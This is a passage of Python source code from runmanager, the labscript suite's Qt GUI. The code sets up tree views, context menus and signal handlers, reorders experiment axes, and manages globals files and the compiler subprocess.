self.axes_model.setHorizontalHeaderItem(self.AXES_COL_LENGTH, length_header_item)
shuffle_header_item = QtGui.QStandardItem('Shuffle')
shuffle_header_item.setToolTip('Whether or not the order of the axis should be randomised')
shuffle_header_item.setIcon(QtGui.QIcon(':qtutils/fugue/arrow-switch'))
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_SHUFFLE, shuffle_header_item)
self.ui.treeView_axes.setModel(self.axes_model)
# Setup stuff for a custom context menu:
self.ui.treeView_axes.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_axes_check_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box'),
'Check selected', self.ui)
self.action_axes_uncheck_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'),
'Uncheck selected', self.ui)
# setup header widths
self.ui.treeView_axes.header().setStretchLastSection(False)
self.ui.treeView_axes.header().setSectionResizeMode(self.AXES_COL_NAME, QtWidgets.QHeaderView.Stretch)
def setup_groups_tab(self):
self.groups_model = QtGui.QStandardItemModel()
self.groups_model.setHorizontalHeaderLabels(['File/group name', 'Active', 'Delete', 'Open/Close'])
self.groups_model.setSortRole(self.GROUPS_ROLE_SORT_DATA)
self.item_delegate = ItemDelegate(self.ui.treeView_groups)
self.ui.treeView_groups.setModel(self.groups_model)
for col in range(self.groups_model.columnCount()):
self.ui.treeView_groups.setItemDelegateForColumn(col, self.item_delegate)
self.ui.treeView_groups.setAnimated(True) # Pretty
self.ui.treeView_groups.setSelectionMode(QtWidgets.QTreeView.ExtendedSelection)
self.ui.treeView_groups.setSortingEnabled(True)
self.ui.treeView_groups.sortByColumn(self.GROUPS_COL_NAME, QtCore.Qt.AscendingOrder)
# Set column widths:
self.ui.treeView_groups.setColumnWidth(self.GROUPS_COL_NAME, 400)
# Make it so the user can just start typing on an item to edit:
self.ui.treeView_groups.setEditTriggers(QtWidgets.QTreeView.AnyKeyPressed |
QtWidgets.QTreeView.EditKeyPressed |
QtWidgets.QTreeView.SelectedClicked)
# Ensure the clickable region of the open/close button doesn't extend forever:
self.ui.treeView_groups.header().setStretchLastSection(False)
# Shrink columns other than the 'name' column to the size of their headers:
for column in range(self.groups_model.columnCount()):
if column != self.GROUPS_COL_NAME:
self.ui.treeView_groups.resizeColumnToContents(column)
self.ui.treeView_groups.setTextElideMode(QtCore.Qt.ElideMiddle)
# Setup stuff for a custom context menu:
self.ui.treeView_groups.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_groups_set_selection_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected group(s) active', self.ui)
self.action_groups_set_selection_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected group(s) inactive', self.ui)
self.action_groups_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected group(s)', self.ui)
self.action_groups_open_selected = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/plus'), 'Open selected group(s)', self.ui)
self.action_groups_close_selected_groups = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected group(s)', self.ui)
self.action_groups_close_selected_files = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected file(s)', self.ui)
# A counter for keeping track of the recursion depth of
# self._groups_model_active_changed(). This is used so that some
# actions can be taken in response to initial data changes, but not to
# flow-on changes made by the method itself:
self.on_groups_model_active_changed_recursion_depth = 0
def connect_signals(self):
# The button that pops the output box in and out:
self.output_popout_button.clicked.connect(self.on_output_popout_button_clicked)
# The menu items:
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionQuit.triggered.connect(self.ui.close)
# labscript file and folder selection stuff:
self.ui.toolButton_select_labscript_file.clicked.connect(self.on_select_labscript_file_clicked)
self.ui.toolButton_select_shot_output_folder.clicked.connect(self.on_select_shot_output_folder_clicked)
self.ui.toolButton_edit_labscript_file.clicked.connect(self.on_edit_labscript_file_clicked)
self.ui.toolButton_reset_shot_output_folder.clicked.connect(self.on_reset_shot_output_folder_clicked)
self.ui.lineEdit_labscript_file.textChanged.connect(self.on_labscript_file_text_changed)
self.ui.lineEdit_shot_output_folder.textChanged.connect(self.on_shot_output_folder_text_changed)
# Control buttons; engage, abort, restart subprocess:
self.ui.pushButton_engage.clicked.connect(self.on_engage_clicked)
self.ui.pushButton_abort.clicked.connect(self.on_abort_clicked)
self.ui.pushButton_restart_subprocess.clicked.connect(self.on_restart_subprocess_clicked)
# shuffle master control
self.ui.pushButton_shuffle.stateChanged.connect(self.on_master_shuffle_clicked)
# Tab closebutton clicked:
self.ui.tabWidget.tabCloseRequested.connect(self.on_tabCloseRequested)
# Axes tab; right click menu, menu actions, reordering
# self.ui.treeView_axes.customContextMenuRequested.connect(self.on_treeView_axes_context_menu_requested)
self.action_axes_check_selected.triggered.connect(self.on_axes_check_selected_triggered)
self.action_axes_uncheck_selected.triggered.connect(self.on_axes_uncheck_selected_triggered)
self.ui.toolButton_axis_to_top.clicked.connect(self.on_axis_to_top_clicked)
self.ui.toolButton_axis_up.clicked.connect(self.on_axis_up_clicked)
self.ui.toolButton_axis_down.clicked.connect(self.on_axis_down_clicked)
self.ui.toolButton_axis_to_bottom.clicked.connect(self.on_axis_to_bottom_clicked)
# axes tab item changed handler
self.axes_model.itemChanged.connect(self.on_axes_item_changed)
self.axes_model.rowsRemoved.connect(self.update_global_shuffle_state)
self.axes_model.rowsInserted.connect(self.update_global_shuffle_state)
# Groups tab; right click menu, menu actions, open globals file, new globals file, diff globals file,
self.ui.treeView_groups.customContextMenuRequested.connect(self.on_treeView_groups_context_menu_requested)
self.action_groups_set_selection_active.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Checked))
self.action_groups_set_selection_inactive.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Unchecked))
self.action_groups_delete_selected.triggered.connect(self.on_groups_delete_selected_triggered)
self.action_groups_open_selected.triggered.connect(self.on_groups_open_selected_triggered)
self.action_groups_close_selected_groups.triggered.connect(self.on_groups_close_selected_groups_triggered)
self.action_groups_close_selected_files.triggered.connect(self.on_groups_close_selected_files_triggered)
self.ui.pushButton_open_globals_file.clicked.connect(self.on_open_globals_file_clicked)
self.ui.pushButton_new_globals_file.clicked.connect(self.on_new_globals_file_clicked)
self.ui.pushButton_diff_globals_file.clicked.connect(self.on_diff_globals_file_clicked)
self.ui.treeView_groups.leftClicked.connect(self.on_treeView_groups_leftClicked)
self.ui.treeView_groups.doubleLeftClicked.connect(self.on_treeView_groups_doubleLeftClicked)
self.groups_model.itemChanged.connect(self.on_groups_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.groups_model_item_changed_disconnected = DisconnectContextManager(
self.groups_model.itemChanged, self.on_groups_model_item_changed)
# Tell Windows how to handle our windows in the taskbar, so that pinning and grouping work properly:
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.output_box_window.newWindow.connect(set_win_appusermodel)
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
self.to_child.put(['quit', None])
return True
def on_keyPress(self, key, modifiers, is_autorepeat):
if key == QtCore.Qt.Key_F5 and modifiers == QtCore.Qt.NoModifier and not is_autorepeat:
self.ui.pushButton_engage.setDown(True)
elif key == QtCore.Qt.Key_W and modifiers == QtCore.Qt.ControlModifier and not is_autorepeat:
current_tab_widget = self.ui.tabWidget.currentWidget()
for (globals_file, group_name), tab in self.currently_open_groups.items():
if tab.ui is current_tab_widget:
self.close_group(globals_file, group_name)
elif modifiers & QtCore.Qt.ControlModifier:
if key == QtCore.Qt.Key_Tab:
change = 1
elif key == QtCore.Qt.Key_Backtab:
change = -1
else:
return
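# Ctrl+Tab / Ctrl+Shift+Tab cycle through the tabs; the modulo below wraps
# around so the last tab leads back to the first and vice versa: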
current_index = self.ui.tabWidget.currentIndex()
n_tabs = self.ui.tabWidget.count()
new_index = (current_index + change) % n_tabs
self.ui.tabWidget.setCurrentIndex(new_index)
def on_keyRelease(self, key, modifiers, is_autorepeat):
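# Releasing F5 raises the engage button again and emits its clicked signal,
# so that pressing F5 behaves like clicking 'Engage':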
if key == QtCore.Qt.Key_F5 and not is_autorepeat:
self.ui.pushButton_engage.setDown(False)
self.ui.pushButton_engage.clicked.emit(False)
def on_output_popout_button_clicked(self):
if self.output_box_is_popped_out:
self.ui.verticalLayout_output_tab.addWidget(self.output_box.output_textedit)
self.output_box_window.hide()
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
else:
# pop it out
# self.ui.verticalLayout_output_tab.remove(self.output_box)
self.output_box_window_verticalLayout.addWidget(self.output_box.output_textedit)
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-in'))
self.output_box_window.show()
self.output_box_is_popped_out = not self.output_box_is_popped_out
def on_select_labscript_file_clicked(self, checked):
labscript_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select labscript file',
self.last_opened_labscript_folder,
"Python files (*.py)")
if type(labscript_file) is tuple:
labscript_file, _ = labscript_file
if not labscript_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
labscript_file = os.path.abspath(labscript_file)
if not os.path.isfile(labscript_file):
error_dialog("No such file %s." % labscript_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_labscript_folder = os.path.dirname(labscript_file)
# Write the file to the lineEdit:
self.ui.lineEdit_labscript_file.setText(labscript_file)
# Tell the output folder thread that the output folder might need updating:
self.output_folder_update_required.set()
def on_edit_labscript_file_clicked(self, checked):
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
# Get the current labscript file:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
# Ignore if no file selected
if not current_labscript_file:
return
if not editor_path:
error_dialog("No editor specified in the labconfig.")
return
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else current_labscript_file for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [current_labscript_file] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_select_shot_output_folder_clicked(self, checked):
shot_output_folder = QtWidgets.QFileDialog.getExistingDirectory(self.ui,
'Select shot output folder',
self.last_selected_shot_output_folder)
if type(shot_output_folder) is tuple:
shot_output_folder, _ = shot_output_folder
if not shot_output_folder:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_output_folder = os.path.abspath(shot_output_folder)
# Save the containing folder for use next time we open the dialog box:
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
# Write the file to the lineEdit:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
# Tell the output folder rollover thread to run an iteration, so that
# it notices this change (even though it won't do anything now - this
# is so it can respond correctly if anything else interesting happens
# within the next second):
self.output_folder_update_required.set()
def on_reset_shot_output_folder_clicked(self, checked):
current_default_output_folder = self.get_default_output_folder()
if current_default_output_folder is None:
return
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
# Tell the output folder rollover thread to run an iteration, so that
# it notices this change (even though it won't do anything now - this
# is so it can respond correctly if anything else interesting happens
# within the next second):
self.output_folder_update_required.set()
def on_labscript_file_text_changed(self, text):
# Blank out the 'edit labscript file' button if no labscript file is
# selected
enabled = bool(text)
self.ui.toolButton_edit_labscript_file.setEnabled(enabled)
# Blank out the 'select shot output folder' button if no labscript
# file is selected:
self.ui.toolButton_select_shot_output_folder.setEnabled(enabled)
self.ui.lineEdit_labscript_file.setToolTip(text)
def on_shot_output_folder_text_changed(self, text):
# Blank out the 'reset default output folder' button if the user is
# already using the default output folder
if text == self.get_default_output_folder():
enabled = False
else:
enabled = True
self.ui.toolButton_reset_shot_output_folder.setEnabled(enabled)
self.ui.lineEdit_shot_output_folder.setToolTip(text)
def on_engage_clicked(self):
logger.info('Engage')
try:
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
labscript_file = self.ui.lineEdit_labscript_file.text()
# Shuffling is applied on a per-global basis, but if ALL of the globals are
# set to shuffle then we may as well shuffle the full list of shots again.
# This randomises the shot order more thoroughly than shuffling within each
# level alone (otherwise all shots sharing a value of the outermost
# variable would still run consecutively).
shuffle = self.ui.pushButton_shuffle.checkState() == QtCore.Qt.Checked
if not labscript_file:
raise Exception('Error: No labscript file selected')
output_folder = self.ui.lineEdit_shot_output_folder.text()
if not output_folder:
raise Exception('Error: No output folder selected')
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
logger.info('Parsing globals...')
active_groups = self.get_active_groups()
# Get ordering of expansion globals
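# expansion_order maps each axis name to its row position and shuffle
# state; for illustration (hypothetical global and zip group names) it
# ends up looking like:
#   {'outer detuning': {'order': 0, 'shuffle': QtCore.Qt.Checked},
#    'zip my_zip_group': {'order': 1, 'shuffle': QtCore.Qt.Unchecked}}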
expansion_order = {}
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
name = item.data(self.AXES_ROLE_NAME)
expansion_order[name] = {'order':i, 'shuffle':shuffle_item.checkState()}
try:
sequenceglobals, shots, evaled_globals, global_hierarchy, expansions = self.parse_globals(active_groups, expansion_order=expansion_order)
except Exception as e:
raise Exception('Error parsing globals:\n%s\nCompilation aborted.' % str(e))
logger.info('Making h5 files')
labscript_file, run_files = self.make_h5_files(
labscript_file, output_folder, sequenceglobals, shots, shuffle)
self.ui.pushButton_abort.setEnabled(True)
self.compile_queue.put([labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer])
except Exception as e:
self.output_box.output('%s\n\n' % str(e), red=True)
logger.info('end engage')
def on_abort_clicked(self):
self.compilation_aborted.set()
def on_restart_subprocess_clicked(self):
# Kill and restart the compilation subprocess
self.to_child.put(['quit', None])
self.from_child.put(['done', False])
time.sleep(0.1)
self.output_box.output('Asking subprocess to quit...')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=False))
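# Poll the child process every 50ms until timeout_time. If it has not
# exited by then, escalate: terminate() it and wait up to a further two
# seconds, and if it still has not exited, kill() it outright.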
def check_child_exited(self, timeout_time, kill=False):
self.child.poll()
if self.child.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill))
return
elif self.child.returncode is None:
if not kill:
self.child.terminate()
self.output_box.output('not responding.\n')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=True))
return
else:
self.child.kill()
self.output_box.output('Killed\n', red=True)
elif kill:
self.output_box.output('Terminated\n', red=True)
else:
self.output_box.output('done.\n')
self.output_box.output('Spawning new compiler subprocess...')
self.to_child, self.from_child, self.child = zprocess.subprocess_with_queues(
'batch_compiler.py', self.output_box.port)
self.output_box.output('done.\n')
self.output_box.output('Ready.\n\n')
def on_tabCloseRequested(self, index):
tab_page = self.ui.tabWidget.widget(index)
for (globals_file, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
self.close_group(globals_file, group_name)
break
def on_treeView_axes_context_menu_requested(self, point):
raise NotImplementedError
# menu = QtWidgets.QMenu(self.ui)
# menu.addAction(self.action_axes_check_selected)
# menu.addAction(self.action_axes_uncheck_selected)
# menu.exec_(QtGui.QCursor.pos())
pass
def on_axes_check_selected_triggered(self, *args):
raise NotImplementedError
def on_axes_uncheck_selected_triggered(self, *args):
raise NotImplementedError
def on_axis_to_top_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# Only move the row while it is not element 0 and the row above it is not
# selected. (A row above may have been initially selected, but by now it
# will be one row higher, since we move rows upwards starting from the
# lowest index.)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# Update the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_axes_indentation()
def on_axis_up_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# Only move the row if it is not element 0 and the row above it is not
# selected. (A row above may have been initially selected, but by now it
# will be one row higher, since we move rows upwards starting from the
# lowest index.)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# Update the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_axes_indentation()
def on_axis_down_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# Only move the row if it is not the last element and the row below it is
# not selected. (A row below may have been initially selected, but by now
# it will be one row lower, since we move rows downwards starting from the
# highest index.)
if row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row back in, one position lower
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# Update the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_axes_indentation()
def on_axis_to_bottom_clicked(self, checked):
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# Only move the row while it is not the last element and the row below it
# is not selected. (A row below may have been initially selected, but by
# now it will be one row lower, since we move rows downwards starting from
# the highest index.)
while row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row back in, one position lower
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# Update the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_axes_indentation()
def on_axes_item_changed(self, item):
if item.column() == self.AXES_COL_SHUFFLE:
self.update_global_shuffle_state()
def update_global_shuffle_state(self, *args, **kwargs):
all_checked = True
none_checked = True
for i in range(self.axes_model.rowCount()):
check_state = self.axes_model.item(i, self.AXES_COL_SHUFFLE).checkState() == QtCore.Qt.Checked
all_checked = all_checked and check_state
none_checked = none_checked and not check_state
if not all_checked and not none_checked:
self.ui.pushButton_shuffle.setTristate(True)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.PartiallyChecked)
elif none_checked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Unchecked)
else:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Checked)
def on_master_shuffle_clicked(self, state):
if state in [QtCore.Qt.Checked, QtCore.Qt.Unchecked]:
self.ui.pushButton_shuffle.setTristate(False)
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
if item.checkState() != state:
self.axes_model.item(i, self.AXES_COL_SHUFFLE).setCheckState(state)
def on_treeView_groups_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_groups_set_selection_active)
menu.addAction(self.action_groups_set_selection_inactive)
menu.addAction(self.action_groups_delete_selected)
menu.addAction(self.action_groups_open_selected)
menu.addAction(self.action_groups_close_selected_groups)
menu.addAction(self.action_groups_close_selected_files)
copy_menu = QtWidgets.QMenu('Copy selected group(s) to...', menu)
copy_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document-copy'))
menu.addMenu(copy_menu)
move_menu = QtWidgets.QMenu('Move selected group(s) to...', menu)
move_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document--arrow'))
menu.addMenu(move_menu)
# Create a dict of all filepaths -> filenames
filenames = {}
for index in range(self.groups_model.rowCount()):
filepath = self.groups_model.item(index, self.GROUPS_COL_NAME).text()
filenames[filepath] = filepath.split(os.sep)[-1]
# Expand duplicate filenames until there are no more duplicates:
i = 2
while True:
new_filename = {}
for filepath, filename in filenames.items():
if list(filenames.values()).count(filename) > 1:
new_filename[filepath] = os.sep.join(filepath.split(os.sep)[-i:])
else:
new_filename[filepath] = filename
if new_filename == filenames:
break
filenames = new_filename
i += 1
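# For example (hypothetical paths), two files both named globals.h5 would
# be displayed as 'experiment1/globals.h5' and 'experiment2/globals.h5'
# rather than as two identical entries.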
# add all filenames to the copy and move submenu
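# (filepath=filepath binds the current value as a default argument so each
# action refers to its own file, not the loop variable's final value.)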
for filepath, filename in filenames.items():
copy_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, False))
move_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, True))
menu.exec_(QtGui.QCursor.pos())
def on_groups_copy_selected_groups_triggered(self, dest_globals_file=None, delete_source_group=False):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
source_globals_file = item.parent().text()
self.copy_group(source_globals_file, item.text(), dest_globals_file, delete_source_group)
def on_groups_set_selection_active_triggered(self, checked_state):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
# Filter to only include the 'active' column:
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
active_items = (item for item in selected_items
if item.column() == self.GROUPS_COL_ACTIVE
and item.parent() is not None)
for item in active_items:
item.setCheckState(checked_state)
def on_groups_delete_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
# If multiple selected, show 'delete n groups?' message. Otherwise,
# pass confirm=True to self.delete_group so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d groups?" % len(name_items)):
return
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
self.delete_group(globals_file, group_name, confirm=not confirm_multiple)
def on_groups_open_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
# Make things a bit faster by acquiring network-only locks on all the
# files we're dealing with up front, so that the individual open and
# close operations are faster.
filenames = set(item.parent().text() for item in name_items)
file_locks = [labscript_utils.h5_lock.NetworkOnlyLock(filename) for filename in filenames]
with nested(*file_locks):
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name, trigger_preparse=False)
if name_items:
self.globals_changed()
def on_groups_close_selected_groups_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) in self.currently_open_groups:
self.close_group(globals_file, group_name)
def on_groups_close_selected_files_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is None]
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE)
for item in name_items
for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if any(child_is_open):
if not question_dialog('Close %d file(s)? This will close %d currently open group(s).' %
(len(name_items), child_is_open.count(True))):
return
for item in name_items:
globals_file = item.text()
self.close_globals_file(globals_file, confirm=False)
def on_open_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
if not os.path.isfile(globals_file):
error_dialog("No such file %s." % globals_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Open the file:
self.open_globals_file(globals_file)
def on_new_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Create new globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
globals_file = os.path.abspath(globals_file)
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Create the new file and open it:
runmanager.new_globals_file(globals_file)
self.open_globals_file(globals_file)
def on_diff_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file to compare',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
# Get runmanager's globals
active_groups = self.get_active_groups()
if active_groups is None:
# Invalid group selection
return
# Get file's globals groups
other_groups = runmanager.get_all_groups(globals_file)
# Display the output tab so the user can see the output:
self.ui.tabWidget.setCurrentWidget(self.ui.tab_output)
self.output_box.output('Globals diff with:\n%s\n\n' % globals_file)
# Do the globals diff
globals_diff_table = runmanager.globals_diff_groups(active_groups, other_groups)
self.output_box.output(globals_diff_table)
self.output_box.output('Ready.\n\n')
def on_treeView_groups_leftClicked(self, index):
"""Here we respond to user clicks on the treeview. We do the following:
- If the user clicks on the <click to add group> dummy row, we go into
edit mode on it so they can enter the name of the new group they
want.
- If the user clicks on the icon to open or close a globals file or a
group, we call the appropriate open and close methods and update the
open/close data role on the model.
- If the user clicks delete on a globals group, we call a delete
method, which deletes it after confirmation, and closes it if it was
open.
"""
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.groups_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
# The parent item, None if there is no parent:
parent_item = item.parent()
# What kind of row did the user click on?
# A globals file, a group, or a 'click to add group' row?
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new group' row. Enter editing
# mode on the name item so they can enter a name for
# the new group:
self.ui.treeView_groups.setCurrentIndex(name_index)
self.ui.treeView_groups.edit(name_index)
if item.column() == self.GROUPS_COL_ACTIVE:
# They clicked on the active column. Toggle the checkbox. We do
# this manually because setting the item checkable means the model
# changes before we catch the mouse click. This is a pain because
# we want the ensuing sorting (if the user is sorting by the
# enabled column) to keep the selection. If the user only
# selected the column by clicking on it, then the sort happens
# before they selected it, and the resort happens without a visual
# indication of where the item went, because it never got
# selected.
state = item.checkState()
if state in (QtCore.Qt.Unchecked, QtCore.Qt.PartiallyChecked):
item.setCheckState(QtCore.Qt.Checked)
elif state == QtCore.Qt.Checked:
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('Invalid Check state')
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, item)
elif parent_item is None:
# They clicked on a globals file row.
globals_file = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the close button. Close the file:
